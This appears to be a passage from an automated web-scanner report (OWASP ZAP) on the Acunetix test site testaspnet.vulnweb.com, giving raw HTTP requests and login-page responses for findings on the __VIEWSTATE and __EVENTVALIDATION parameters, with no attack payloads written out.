</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" 